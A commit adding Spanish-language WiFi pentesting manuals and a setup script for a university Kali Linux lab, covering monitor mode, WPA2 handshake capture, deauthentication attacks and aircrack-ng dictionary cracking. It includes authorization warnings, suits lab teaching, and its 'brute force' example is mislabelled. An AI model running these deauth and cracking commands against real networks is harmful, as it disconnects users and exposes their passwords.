08-ago: [discovery] Lecciones USB Linux ext4 + Realtek 8812AU + scripts kali-todo
This commit is contained in:
316
docs/MANUAL_PENTEST.txt
Normal file
316
docs/MANUAL_PENTEST.txt
Normal file
@@ -0,0 +1,316 @@
|
||||
=============================================
|
||||
MANUAL PENTESTING WiFi - ALPHA AWUS036ACH
|
||||
=============================================
|
||||
Chipset: RTL8812AU | Dual-band 2.4/5GHz
|
||||
Para laboratorio universitario con Live Boot USB Kali Linux
|
||||
|
||||
CONTENIDO:
|
||||
PARTE 1: Instalar driver en Windows
|
||||
PARTE 2: Crear USB bootable de Kali Linux
|
||||
PARTE 3: Arrancar Kali desde USB
|
||||
PARTE 4: Activar modo monitor
|
||||
PARTE 5: Escanear redes WiFi
|
||||
PARTE 6: Capturar handshake de una red
|
||||
PARTE 7: Ataque de deauth (forzar handshake)
|
||||
PARTE 8: Crackear la contraseña
|
||||
PARTE 9: Persistencia del USB
|
||||
PARTE 10: Resumen de comandos rapidos
|
||||
PARTE 11: Tips laboratorio universitario
|
||||
|
||||
|
||||
=============================================
|
||||
PARTE 1: INSTALAR DRIVER EN WINDOWS
|
||||
=============================================
|
||||
|
||||
Paso 1: Descargar driver
|
||||
Ve a https://docs.alfa.com.tw/Product/AWUS036ACH/
|
||||
Descarga el driver Windows (RTL8812AU).
|
||||
|
||||
Paso 2: Instalar
|
||||
1. Desconecta la antena
|
||||
2. Ejecuta el instalador como administrador
|
||||
3. Reinicia el PC
|
||||
4. Conecta la antena despues de reiniciar
|
||||
|
||||
Paso 3: Verificar
|
||||
Abre PowerShell y ejecuta:
|
||||
Get-NetAdapter
|
||||
Deberias ver "Realtek 8812AU" con estado "Up".
|
||||
|
||||
En Windows solo puedes escanear redes con Acrylic WiFi Free.
|
||||
Para pentesting REAL necesitas Kali Linux (Parte 2).
|
||||
|
||||
|
||||
=============================================
|
||||
PARTE 2: CREAR USB BOOTABLE DE KALI LINUX
|
||||
=============================================
|
||||
|
||||
Paso 1: Descargar Kali
|
||||
Ve a https://www.kali.org/get-kali/
|
||||
Descarga "Kali Linux 2026.x Installer" (ISO, ~4GB)
|
||||
|
||||
Paso 2: Grabar ISO en USB con Rufus
|
||||
Necesitas: USB de 16GB minimo + Rufus
|
||||
|
||||
1. Descarga Rufus desde https://rufus.ie/
|
||||
2. Inserta el USB
|
||||
3. Abre Rufus
|
||||
4. Device = tu USB
|
||||
5. Boot selection = selecciona el ISO de Kali
|
||||
6. Partition scheme = MBR
|
||||
7. Target system = BIOS o UEFI
|
||||
8. Persistent storage -> mueve la barra a 8-12 GB
|
||||
>>> ESTO ES LO QUE CREA LA PARTICION PERSISTENTE <<<
|
||||
Si no la mueves, TODO se pierde al apagar
|
||||
9. Haz clic en START
|
||||
10. Selecciona "Write in DD mode" cuando pregunte
|
||||
11. Espera a que termine (~10-15 min)
|
||||
|
||||
|
||||
=============================================
|
||||
PARTE 3: ARRANCAR KALI DESDE USB
|
||||
=============================================
|
||||
|
||||
Paso 1: Configurar BIOS para arrancar desde USB
|
||||
1. Reinicia el PC
|
||||
2. Pulsa F2, F12 o DEL al encender (depende del PC)
|
||||
3. En BIOS ve a "Boot" o "Boot Order"
|
||||
4. Pon "USB-HDD" o "Removable Device" como primera opcion
|
||||
5. Guarda y sal (F10 normalmente)
|
||||
|
||||
Paso 2: Arrancar Kali
|
||||
1. En el menu de GRUB selecciona "Live system (amd64)"
|
||||
2. Usuario: kali / Contrasena: kali
|
||||
|
||||
Paso 3: Conectar la antena Alpha
|
||||
1. Conecta la Alpha por USB DESPUES de arrancar Kali
|
||||
2. Abre terminal y verifica:
|
||||
lsusb
|
||||
Debe aparecer: Realtek Semiconductor Corp. RTL8812AU
|
||||
|
||||
3. Verifica la interfaz de red:
|
||||
iwconfig
|
||||
Debe aparecer: wlan0 o wlan1
|
||||
|
||||
Si NO aparece wlan0, instala el driver:
|
||||
sudo apt update
|
||||
sudo apt install -y realtek-rtl88xxau-dkms
|
||||
sudo reboot
|
||||
|
||||
|
||||
=============================================
|
||||
PARTE 4: ACTIVAR MODO MONITOR
|
||||
=============================================
|
||||
|
||||
El modo monitor permite escuchar TODO el tráfico WiFi
|
||||
sin estar conectado a ninguna red. Es la base del pentesting.
|
||||
|
||||
# 1. Matar procesos que interfieran
|
||||
sudo airmon-ng check kill
|
||||
|
||||
# 2. Activar modo monitor
|
||||
sudo airmon-ng start wlan0
|
||||
|
||||
# 3. Verificar que esta en modo monitor
|
||||
iwconfig wlan0mon
|
||||
# Debe decir: "Mode: Monitor"
|
||||
|
||||
Si en vez de wlan0mon aparece wlan0 en modo monitor,
|
||||
usa wlan0 en todos los comandos siguientes.
|
||||
|
||||
SALIR del modo monitor cuando termines:
|
||||
sudo airmon-ng stop wlan0mon
|
||||
|
||||
|
||||
=============================================
|
||||
PARTE 5: ESCANEAR REDES WiFi
|
||||
=============================================
|
||||
|
||||
Este es el paso mas importante. Aqui ves TODAS las redes
|
||||
a tu alrededor.
|
||||
|
||||
sudo airodump-ng wlan0mon
|
||||
|
||||
Veras una tabla con estas columnas:
|
||||
|
||||
BSSID = MAC del punto de acceso (router)
|
||||
PWR = Potencia de señal (-30=excelente, -90=malo)
|
||||
Beacons = Paquetes beacon recibidos
|
||||
#Data = Paquetes de datos capturados
|
||||
CH = Canal (1-13 en 2.4GHz, 36-165 en 5GHz)
|
||||
ENC = Cifrado (WPA2, WPA3, OPN=abierto)
|
||||
ESSID = Nombre de la red WiFi
|
||||
|
||||
PARA PARAR: pulsa Ctrl+C
|
||||
|
||||
CONSEJOS para elegir red objetivo:
|
||||
- PWR entre -30 y -60 = buena señal (lo ideal)
|
||||
- #Data alto = hay trafico (clientes activos)
|
||||
- ENC = WPA2 (es el mas comun, se puede crackear)
|
||||
- Evita OPN (abierto) y WPA3 (dificil)
|
||||
|
||||
|
||||
=============================================
|
||||
PARTE 6: CAPTURAR HANDSHAKE DE UNA RED
|
||||
=============================================
|
||||
|
||||
Una vez que has elegido tu red objetivo (por ejemplo
|
||||
"CampusLab" en canal 6 con BSSID AA:BB:CC:DD:EE:FF),
|
||||
|
||||
abre UNA NUEVA terminal (no cierres la de escaneo)
|
||||
y ejecuta:
|
||||
|
||||
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w captura wlan0mon
|
||||
|
||||
REEMPLAZA:
|
||||
- "6" por el canal de tu red objetivo
|
||||
- "AA:BB:CC:DD:EE:FF" por el BSSID de tu red
|
||||
- "captura" es el nombre del archivo donde guardara datos
|
||||
|
||||
Este comando:
|
||||
1. Escucha SOLO esa red en su canal
|
||||
2. Guarda todo en archivos: captura-01.cap, captura-01.csv
|
||||
3. Espera a que aparezca un "WPA handshake"
|
||||
|
||||
El WPA handshake aparece arriba a la derecha:
|
||||
WPA handshake: AA:BB:CC:DD:EE:FF
|
||||
|
||||
ESTO ES LO QUE NECESITAS para crackear la contrasena.
|
||||
|
||||
Si no aparece el handshake, necesitas un cliente
|
||||
conectandose. Sigue en la Parte 7 para forzarlo.
|
||||
|
||||
|
||||
=============================================
|
||||
PARTE 7: ATAQUE DE DEAUTH (FORZAR HANDSHAKE)
|
||||
=============================================
|
||||
|
||||
Si el handshake no aparece solo, puedes FORZAR a un
|
||||
cliente a reconectarse. Esto le desconecta momentaneamente
|
||||
y al reconectarse se captura el handshake.
|
||||
|
||||
ABRE UNA TERCERA terminal y ejecuta:
|
||||
|
||||
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c XX:XX:XX:XX:XX:XX wlan0mon
|
||||
|
||||
REEMPLAZA:
|
||||
- "5" = numero de paquetes de deauth (5-10 suele bastar)
|
||||
- "AA:BB:CC:DD:EE:FF" = BSSID del router (igual que antes)
|
||||
- "XX:XX:XX:XX:XX:XX" = MAC del cliente conectado
|
||||
|
||||
Para ver clientes conectados a tu red, mira la terminal
|
||||
de la Parte 6. Bajo la columna "STATION" veras las MAC
|
||||
de los clientes conectados.
|
||||
|
||||
Si no sabes la MAC del cliente, puedes omitir -c:
|
||||
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon
|
||||
|
||||
Esto envia deauth a TODOS los clientes de esa red.
|
||||
|
||||
VERIFICA que aparezca "WPA handshake" en la terminal
|
||||
de la Parte 6 despues del ataque.
|
||||
|
||||
|
||||
=============================================
|
||||
PARTE 8: CRACKEAR LA CONTRASEÑA
|
||||
=============================================
|
||||
|
||||
Una vez tengas el WPA handshake capturado:
|
||||
|
||||
Paso 1: Descomprimir el diccionario
|
||||
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
|
||||
|
||||
Paso 2: Ejecutar aircrack-ng
|
||||
aircrack-ng -w /usr/share/wordlists/rockyou.txt captura-01.cap
|
||||
|
||||
Sustituye "captura-01.cap" por el nombre de tu archivo.
|
||||
|
||||
Esto prueba TODAS las contrasenas del diccionario contra
|
||||
el handshake capturado. Velocidad: ~1000-5000 claves/segundo.
|
||||
|
||||
Si la contrasena esta en el diccionario veras:
|
||||
KEY FOUND! [ la_contrasena ]
|
||||
|
||||
Si no esta en el diccionario:
|
||||
- Prueba con otro diccionario mas grande
|
||||
- O usa fuerza bruta (mucho mas lento):
|
||||
aircrack-ng -a 2 -b AA:BB:CC:DD:EE:FF -w /usr/share/wordlists/rockyou.txt captura-01.cap
|
||||
|
||||
|
||||
=============================================
|
||||
PARTE 9: PERSISTENCIA DEL USB (GUARDAR RESULTADOS)
|
||||
=============================================
|
||||
|
||||
Si usas Kali Live, al reiniciar TODO se pierde
|
||||
a menos que tengas persistencia.
|
||||
|
||||
Opcion A - Rufus Persistent Partition (ya lo hiciste en Parte 2)
|
||||
Si activaste "Persistent storage" en Rufus, los archivos en
|
||||
/home/kali se guardan automaticamente entre reinicios.
|
||||
|
||||
Opcion B - Montar particion persistente manualmente:
|
||||
sudo mkdir -p /mnt/persistence
|
||||
sudo mount /dev/sdb3 /mnt/persistence
|
||||
cp captura-01.cap /mnt/persistence/
|
||||
echo "RED: CampusLab | PASS: la_contrasena" > /mnt/persistence/wifi_cracked.txt
|
||||
sudo umount /mnt/persistence
|
||||
|
||||
Opcion C - Segundo USB o red:
|
||||
cp captura-01.cap /media/kali/MI_USB/
|
||||
# O subir a un servidor:
|
||||
scp captura-01.cap user@ip_servidor:/ruta/
|
||||
|
||||
|
||||
=============================================
|
||||
PARTE 10: RESUMEN DE COMANDOS RAPIDOS
|
||||
=============================================
|
||||
|
||||
Ver antena: lsusb && iwconfig
|
||||
Matar interferencias: sudo airmon-ng check kill
|
||||
Activar monitor: sudo airmon-ng start wlan0
|
||||
Escanear redes: sudo airodump-ng wlan0mon
|
||||
Capturar 1 red: sudo airodump-ng -c CH --bssid MAC -w file wlan0mon
|
||||
Deauth 1 cliente: sudo aireplay-ng --deauth 5 -a MAC_AP -c MAC_CLI wlan0mon
|
||||
Crackear: aircrack-ng -w rockyou.txt file.cap
|
||||
Salir monitor: sudo airmon-ng stop wlan0mon
|
||||
|
||||
|
||||
=============================================
|
||||
PARTE 11: TIPS PARA EL LABORATORIO UNIVERSITARIO
|
||||
=============================================
|
||||
|
||||
1. Empieza solo con escaneo pasivo (airodump-ng) - aprende
|
||||
a leer las redes antes de hacer nada activo.
|
||||
|
||||
2. Documenta que redes hay, en que canales, que cifrado usan.
|
||||
|
||||
3. Solo testea redes que tengas autorizacion explicita -
|
||||
pide al profesor/encargado por escrito.
|
||||
|
||||
4. Practica primero con tu propio router si puedes.
|
||||
|
||||
5. El rockyou.txt viene en Kali en /usr/share/wordlists/
|
||||
(descomprimir con sudo gunzip).
|
||||
|
||||
6. No hagas deauth en redes publicas reales - es ilegal
|
||||
sin autorizacion.
|
||||
|
||||
7. Si la senal es mala (PWR < -70), acercate al router
|
||||
o usa la antena con el reflector parabolico.
|
||||
|
||||
|
||||
=============================================
|
||||
LEER ESTE MANUAL DESDE KALI LIVE
|
||||
=============================================
|
||||
|
||||
Si copiaste este archivo al USB de Kali, puedes leerlo
|
||||
desde la terminal con:
|
||||
|
||||
sudo mount /dev/sdb1 /mnt
|
||||
cat /mnt/MANUAL_PENTEST.txt
|
||||
|
||||
O para verlo pagina por pagina:
|
||||
cat /mnt/MANUAL_PENTEST.txt | less
|
||||
|
||||
Para copiarlo al escritorio de Kali:
|
||||
cp /mnt/MANUAL_PENTEST.txt ~/Desktop/
|
||||
148
docs/arranque_rapido.sh
Normal file
148
docs/arranque_rapido.sh
Normal file
@@ -0,0 +1,148 @@
|
||||
#!/bin/bash
|
||||
#=============================================
|
||||
# ARRANQUE RAPIDO - KALI LIVE + ALPHA AWUS036ACH
|
||||
#=============================================
|
||||
# Ejecutar con: sudo bash arranque_rapido.sh
|
||||
# Guardar en el USB y ejecutar al arrancar Kali Live
|
||||
#=============================================
|
||||
|
||||
set -e
|
||||
|
||||
echo ""
|
||||
echo "============================================"
|
||||
echo " ARRANQUE RAPIDO - PENTESTING WiFi"
|
||||
echo " Alpha AWUS036ACH (RTL8812AU)"
|
||||
echo "============================================"
|
||||
echo ""
|
||||
|
||||
# Colores
|
||||
ROJO='\033[0;31m'
|
||||
VERDE='\033[0;36m'
|
||||
AMARILLO='\033[1;33m'
|
||||
SIN_COLOR='\033[0m'
|
||||
|
||||
# Paso 0: Verificar que somos root
|
||||
if [ "$EUID" -ne 0 ]; then
|
||||
echo -e "${ROJO}[ERROR] Ejecuta con sudo: sudo bash arranque_rapido.sh${SIN_COLOR}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Paso 1: Verificar conexion a internet
|
||||
echo -e "${AMARILLO}[1/6] Verificando internet...${SIN_COLOR}"
|
||||
if ping -c 1 google.com &> /dev/null; then
|
||||
echo -e "${VERDE} OK - Internet conectado${SIN_COLOR}"
|
||||
else
|
||||
echo -e "${ROJO} SIN INTERNET - conecta WiFi o cable antes de continuar${SIN_COLOR}"
|
||||
echo " Si no tienes internet, este script no puede instalar paquetes."
|
||||
echo " Pulsa Ctrl+C para salir o Enter para intentar sin internet..."
|
||||
read -s
|
||||
fi
|
||||
|
||||
# Paso 2: Actualizar repositorios
|
||||
echo ""
|
||||
echo -e "${AMARILLO}[2/6] Actualizando repositorios (apt update)...${SIN_COLOR}"
|
||||
if ping -c 1 google.com &> /dev/null; then
|
||||
apt update -qq
|
||||
echo -e "${VERDE} OK - Repositorios actualizados${SIN_COLOR}"
|
||||
else
|
||||
echo -e "${ROJO} SALTADO - sin internet${SIN_COLOR}"
|
||||
fi
|
||||
|
||||
# Paso 3: Instalar paquetes necesarios
|
||||
echo ""
|
||||
echo -e "${AMARILLO}[3/6] Instalando paquetes necesarios...${SIN_COLOR}"
|
||||
if ping -c 1 google.com &> /dev/null; then
|
||||
apt install -y -qq aircrack-ng realtek-rtl88xxau-dkms wireless-tools iw wpasupplicant 2>/dev/null
|
||||
echo -e "${VERDE} OK - Paquetes instalados${SIN_COLOR}"
|
||||
else
|
||||
echo -e "${ROJO} SALTADO - sin internet${SIN_COLOR}"
|
||||
fi
|
||||
|
||||
# Paso 4: Verificar la antena
|
||||
echo ""
|
||||
echo -e "${AMARILLO}[4/6] Verificando antena Alpha...${SIN_COLOR}"
|
||||
if lsusb | grep -qi "realtek\|8812\|rtl88"; then
|
||||
echo -e "${VERDE} OK - Alpha AWUS036ACH detectada${SIN_COLOR}"
|
||||
else
|
||||
echo -e "${ROJO} NO DETECTADA - conecta la antena por USB${SIN_COLOR}"
|
||||
echo " Si ya esta conectada, prueba: sudo reboot"
|
||||
fi
|
||||
|
||||
# Paso 5: Detectar interfaz WiFi
|
||||
echo ""
|
||||
echo -e "${AMARILLO}[5/6] Detectando interfaz WiFi...${SIN_COLOR}"
|
||||
WLAN=""
|
||||
for iface in wlan0 wlan1 wlan2; do
|
||||
if ip link show "$iface" &> /dev/null; then
|
||||
WLAN="$iface"
|
||||
break
|
||||
fi
|
||||
done
|
||||
|
||||
if [ -n "$WLAN" ]; then
|
||||
echo -e "${VERDE} OK - Interfaz encontrada: $WLAN${SIN_COLOR}"
|
||||
else
|
||||
echo -e "${ROJO} NO SE ENCONTRO interfaz wlan${SIN_COLOR}"
|
||||
echo " Ejecuta manualmente: iwconfig"
|
||||
echo " Si no aparece nada, reinicia con la antena conectada"
|
||||
fi
|
||||
|
||||
# Paso 6: Activar modo monitor
|
||||
echo ""
|
||||
echo -e "${AMARILLO}[6/6] Activando modo monitor...${SIN_COLOR}"
|
||||
|
||||
if [ -n "$WLAN" ]; then
|
||||
# Matar procesos que interfieran
|
||||
airmon-ng check kill &> /dev/null
|
||||
|
||||
# Activar modo monitor
|
||||
airmon-ng start "$WLAN" &> /dev/null
|
||||
|
||||
# Verificar
|
||||
if iwconfig wlan0mon 2>/dev/null | grep -q "Monitor"; then
|
||||
echo -e "${VERDE} OK - Modo monitor activo en wlan0mon${SIN_COLOR}"
|
||||
MONIF="wlan0mon"
|
||||
elif iwconfig "${WLAN}" 2>/dev/null | grep -q "Monitor"; then
|
||||
echo -e "${VERDE} OK - Modo monitor activo en $WLAN${SIN_COLOR}"
|
||||
MONIF="$WLAN"
|
||||
else
|
||||
echo -e "${AMARILLO} No se pudo verificar. Comprueba manualmente con: iwconfig${SIN_COLOR}"
|
||||
MONIF="wlan0mon"
|
||||
fi
|
||||
else
|
||||
echo -e "${ROJO} SALTADO - sin interfaz WiFi${SIN_COLOR}"
|
||||
MONIF=""
|
||||
fi
|
||||
|
||||
# Resumen
|
||||
echo ""
|
||||
echo "============================================"
|
||||
echo " RESUMEN"
|
||||
echo "============================================"
|
||||
if [ -n "$MONIF" ]; then
|
||||
echo -e " Modo monitor: ${VERDE}ACTIVO${SIN_COLOR} ($MONIF)"
|
||||
echo ""
|
||||
echo " SIGUIENTE PASO - Escanear redes:"
|
||||
echo " sudo airodump-ng $MONIF"
|
||||
echo ""
|
||||
echo " Cuando veas tu red objetivo, captura el handshake:"
|
||||
echo " sudo airodump-ng -c CANAL --bssid MAC -w captura $MONIF"
|
||||
echo ""
|
||||
echo " Para forzar handshake (deauth):"
|
||||
echo " sudo aireplay-ng --deauth 5 -a MAC_AP -c MAC_CLI $MONIF"
|
||||
echo ""
|
||||
echo " Para crackear:"
|
||||
echo " aircrack-ng -w /usr/share/wordlists/rockyou.txt captura-01.cap"
|
||||
else
|
||||
echo -e " Modo monitor: ${ROJO}NO ACTIVADO${SIN_COLOR}"
|
||||
echo ""
|
||||
echo " Ejecuta manualmente:"
|
||||
echo " sudo airmon-ng check kill"
|
||||
echo " sudo airmon-ng start wlan0"
|
||||
echo " iwconfig wlan0mon"
|
||||
fi
|
||||
echo ""
|
||||
echo " SALIR del modo monitor cuando termines:"
|
||||
echo " sudo airmon-ng stop wlan0mon"
|
||||
echo "============================================"
|
||||
echo ""
|
||||
305
docs/manual_pentesting_alpha_awus036ach.md
Normal file
305
docs/manual_pentesting_alpha_awus036ach.md
Normal file
@@ -0,0 +1,305 @@
|
||||
# MANUAL PENTESTING WiFi — Alpha AWUS036ACH
|
||||
**Chipset:** RTL8812AU | Dual-band 2.4/5GHz
|
||||
**Entorno:** Laboratorio universitario con Live Boot USB Kali Linux
|
||||
|
||||
---
|
||||
|
||||
## PARTE 1: INSTALAR DRIVER EN WINDOWS
|
||||
|
||||
### Paso 1: Descargar driver
|
||||
Ve a https://docs.alfa.com.tw/Product/AWUS036ACH/
|
||||
Descarga el driver Windows (RTL8812AU).
|
||||
|
||||
### Paso 2: Instalar
|
||||
1. Desconecta la antena
|
||||
2. Ejecuta el instalador como administrador
|
||||
3. Reinicia el PC
|
||||
4. Conecta la antena después de reiniciar
|
||||
|
||||
### Paso 3: Verificar
|
||||
Abre PowerShell y ejecuta:
|
||||
```
|
||||
Get-NetAdapter
|
||||
```
|
||||
Deberías ver la interfaz "Realtek 8812AU" con estado "Up".
|
||||
|
||||
> En Windows solo puedes escanar redes con Acrylic WiFi Free.
|
||||
> Para pentesting REAL necesitas Kali Linux (Parte 2).
|
||||
|
||||
---
|
||||
|
||||
## PARTE 2: CREAR USB BOOTABLE DE KALI LINUX (CON PERSISTENCIA)
|
||||
|
||||
### Paso 1: Descargar Kali
|
||||
Ve a https://www.kali.org/get-kali/
|
||||
Descarga "Kali Linux 2026.x Installer" (ISO, ~4GB)
|
||||
|
||||
### Paso 2: Grabar ISO en USB con Rufus
|
||||
**Necesitas:** USB de 16GB mínimo + Rufus
|
||||
|
||||
1. Descarga Rufus desde https://rufus.ie/
|
||||
2. Inserta el USB
|
||||
3. Abre Rufus
|
||||
4. **Device** = tu USB
|
||||
5. **Boot selection** = selecciona el ISO de Kali
|
||||
6. **Partition scheme** = MBR
|
||||
7. **Target system** = BIOS o UEFI
|
||||
8. **Persistent storage** → mueve la barra a **8-12 GB**
|
||||
⚠️ ESTO ES LO QUE CREA LA PARTICIÓN PERSISTENTE
|
||||
Si no la mueves, TODO se pierde al apagar
|
||||
9. Haz clic en **START**
|
||||
10. Selecciona **"Write in DD mode"** cuando pregunte
|
||||
11. Espera a que termine (~10-15 min)
|
||||
|
||||
---
|
||||
|
||||
## PARTE 3: ARRANCAR KALI DESDE USB
|
||||
|
||||
### Paso 1: Configurar BIOS para arrancar desde USB
|
||||
1. Reinicia el PC
|
||||
2. Pulsa **F2, F12 o DEL** al encender (depende del PC)
|
||||
3. En BIOS ve a "Boot" o "Boot Order"
|
||||
4. Pon **"USB-HDD"** o **"Removable Device"** como primera opción
|
||||
5. Guarda y sal (**F10** normalmente)
|
||||
|
||||
### Paso 2: Arrancar Kali
|
||||
1. En el menú de GRUB selecciona **"Live system (amd64)"**
|
||||
2. Usuario: `kali` / Contraseña: `kali`
|
||||
|
||||
### Paso 3: Conectar la antena Alpha
|
||||
1. Conecta la Alpha por USB **DESPUÉS** de arrancar Kali
|
||||
2. Abre terminal y verifica:
|
||||
```bash
|
||||
lsusb
|
||||
# Debe aparecer: Realtek Semiconductor Corp. RTL8812AU
|
||||
```
|
||||
```bash
|
||||
iwconfig
|
||||
# Debe aparecer: wlan0 o wlan1
|
||||
```
|
||||
|
||||
**Si NO aparece wlan0**, instala el driver:
|
||||
```bash
|
||||
sudo apt update
|
||||
sudo apt install -y realtek-rtl88xxau-dkms
|
||||
sudo reboot
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## PARTE 4: ACTIVAR MODO MONITOR
|
||||
|
||||
El modo monitor permite escuchar TODO el tráfico WiFi sin estar conectado a ninguna red. Es la base del pentesting.
|
||||
|
||||
```bash
|
||||
# 1. Matar procesos que interfieran
|
||||
sudo airmon-ng check kill
|
||||
|
||||
# 2. Activar modo monitor
|
||||
sudo airmon-ng start wlan0
|
||||
|
||||
# 3. Verificar que está en modo monitor
|
||||
iwconfig wlan0mon
|
||||
# Debe decir: "Mode: Monitor"
|
||||
```
|
||||
|
||||
> Si en vez de `wlan0mon` aparece `wlan0` en modo monitor,
|
||||
> usa `wlan0` en todos los comandos siguientes.
|
||||
|
||||
**SALIR del modo monitor cuando termines:**
|
||||
```bash
|
||||
sudo airmon-ng stop wlan0mon
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## PARTE 5: ESCANEAR REDES WiFi
|
||||
|
||||
Este es el paso más importante. Aquí ves TODAS las redes a tu alrededor.
|
||||
|
||||
```bash
|
||||
sudo airodump-ng wlan0mon
|
||||
```
|
||||
|
||||
### Columnas de la tabla:
|
||||
|
||||
| Columna | Significado |
|
||||
|---------|-------------|
|
||||
| **BSSID** | MAC del punto de acceso (router) |
|
||||
| **PWR** | Potencia de señal (-30=excelente, -90=malo) |
|
||||
| **Beacons** | Paquetes beacon recibidos |
|
||||
| **#Data** | Paquetes de datos capturados |
|
||||
| **CH** | Canal (1-13 en 2.4GHz, 36-165 en 5GHz) |
|
||||
| **ENC** | Cifrado (WPA2, WPA3, OPN=abierto) |
|
||||
| **ESSID** | Nombre de la red WiFi |
|
||||
|
||||
**PARA PARAR:** pulsa `Ctrl+C`
|
||||
|
||||
### Consejos para elegir red objetivo:
|
||||
- **PWR entre -30 y -60** = buena señal (lo ideal)
|
||||
- **#Data alto** = hay tráfico (clientes activos)
|
||||
- **ENC = WPA2** (el más común, se puede crackear)
|
||||
- Evita OPN (abierto) y WPA3 (muy difícil)
|
||||
|
||||
---
|
||||
|
||||
## PARTE 6: CAPTURAR HANDSHAKE DE UNA RED
|
||||
|
||||
Una vez elegida tu red objetivo (por ejemplo "CampusLab" canal 6, BSSID AA:BB:CC:DD:EE:FF):
|
||||
|
||||
**Abre UNA NUEVA terminal** (no cierres la de escaneo) y ejecuta:
|
||||
|
||||
```bash
|
||||
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w captura wlan0mon
|
||||
```
|
||||
|
||||
**REEMPLAZA:**
|
||||
- `6` → el canal de tu red objetivo
|
||||
- `AA:BB:CC:DD:EE:FF` → el BSSID de tu red
|
||||
- `captura` → nombre del archivo de salida
|
||||
|
||||
### Esto hace:
|
||||
1. Escucha SOLO esa red en su canal
|
||||
2. Guarda todo en archivos: `captura-01.cap`, `captura-01.csv`
|
||||
3. Espera a que aparezca un **"WPA handshake"**
|
||||
|
||||
El WPA handshake aparece arriba a la derecha:
|
||||
```
|
||||
WPA handshake: AA:BB:CC:DD:EE:FF
|
||||
```
|
||||
|
||||
**ESTO ES LO QUE NECESITAS** para crackear la contraseña.
|
||||
|
||||
Si no aparece el handshake, necesitas un cliente conectándose → Parte 7.
|
||||
|
||||
---
|
||||
|
||||
## PARTE 7: ATAQUE DE DEAUTH (FORZAR HANDSHAKE)
|
||||
|
||||
Si el handshake no aparece solo, puedes **FORZAR** a un cliente a reconectarse. Le desconecta momentáneamente y al reconectarse se captura el handshake.
|
||||
|
||||
**ABRE UNA TERCERA terminal** y ejecuta:
|
||||
|
||||
```bash
|
||||
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c XX:XX:XX:XX:XX:XX wlan0mon
|
||||
```
|
||||
|
||||
**REEMPLAZA:**
|
||||
- `5` → número de paquetes de deauth (5-10 suele bastar)
|
||||
- `AA:BB:CC:DD:EE:FF` → BSSID del router (igual que antes)
|
||||
- `XX:XX:XX:XX:XX:XX` → MAC del cliente conectado
|
||||
|
||||
### Para ver clientes conectados:
|
||||
Mira la terminal de la Parte 6. Bajo la columna **"STATION"** verás las MAC de los clientes.
|
||||
|
||||
Si no sabes la MAC del cliente, puedes omitir `-c`:
|
||||
```bash
|
||||
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon
|
||||
```
|
||||
Esto envía deauth a **TODOS** los clientes de esa red.
|
||||
|
||||
**VERIFICA** que aparezca `"WPA handshake"` en la terminal de la Parte 6 después del ataque.
|
||||
|
||||
---
|
||||
|
||||
## PARTE 8: CRACKEAR LA CONTRASEÑA
|
||||
|
||||
Una vez tengas el WPA handshake capturado:
|
||||
|
||||
### Paso 1: Descomprimir el diccionario
|
||||
```bash
|
||||
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
|
||||
```
|
||||
|
||||
### Paso 2: Ejecutar aircrack-ng
|
||||
```bash
|
||||
aircrack-ng -w /usr/share/wordlists/rockyou.txt captura-01.cap
|
||||
```
|
||||
Sustituye `captura-01.cap` por el nombre de tu archivo.
|
||||
|
||||
Esto prueba **TODAS** las contraseñas del diccionario contra el handshake capturado.
|
||||
Velocidad: ~1000-5000 claves/segundo.
|
||||
|
||||
### Si la contraseña está en el diccionario:
|
||||
```
|
||||
KEY FOUND! [ la_contraseña ]
|
||||
```
|
||||
|
||||
### Si no está en el diccionario:
|
||||
- Prueba con otro diccionario más grande
|
||||
- O usa fuerza bruta (mucho más lento):
|
||||
```bash
|
||||
aircrack-ng -a 2 -b AA:BB:CC:DD:EE:FF -w /usr/share/wordlists/rockyou.txt captura-01.cap
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## PARTE 9: PERSISTENCIA DEL USB (GUARDAR RESULTADOS)
|
||||
|
||||
Si usas Kali Live, al reiniciar **TODO se pierde** a menos que tengas persistencia.
|
||||
|
||||
### Opción A — Rufus Persistent Partition (ya lo hiciste en Parte 2)
|
||||
Si activaste "Persistent storage" en Rufus, los archivos en `/home/kali` se guardan automáticamente entre reinicios.
|
||||
|
||||
### Opción B — Montar la partición persistente manualmente
|
||||
```bash
|
||||
# Identificar la partición
|
||||
lsblk
|
||||
# Busca la partición más grande del USB (sdb3 normalmente)
|
||||
|
||||
# Montar
|
||||
sudo mkdir -p /mnt/persistence
|
||||
sudo mount /dev/sdb3 /mnt/persistence
|
||||
|
||||
# Copiar resultados
|
||||
cp captura-01.cap /mnt/persistence/
|
||||
echo "RED: CampusLab | PASS: la_contraseña" > /mnt/persistence/wifi_cracked.txt
|
||||
|
||||
# Desmontar
|
||||
sudo umount /mnt/persistence
|
||||
```
|
||||
|
||||
### Opción C — Segundo USB o red
|
||||
```bash
|
||||
# A tu propio USB
|
||||
cp captura-01.cap /media/kali/MI_USB/
|
||||
|
||||
# O subir a un servidor
|
||||
scp captura-01.cap user@ip_servidor:/ruta/
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## PARTE 10: GUARDAR LA CONTRASEÑA
|
||||
|
||||
```bash
|
||||
echo "RED: CampusLab | PASS: la_contraseña" >> ~/wifi_cracked.txt
|
||||
cat ~/wifi_cracked.txt
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## PARTE 11: RESUMEN DE COMANDOS RÁPIDOS
|
||||
|
||||
| Paso | Comando |
|
||||
|------|---------|
|
||||
| Ver antena | `lsusb && iwconfig` |
|
||||
| Matar interferencias | `sudo airmon-ng check kill` |
|
||||
| Activar monitor | `sudo airmon-ng start wlan0` |
|
||||
| Escanear redes | `sudo airodump-ng wlan0mon` |
|
||||
| Capturar 1 red | `sudo airodump-ng -c CH --bssid MAC -w file wlan0mon` |
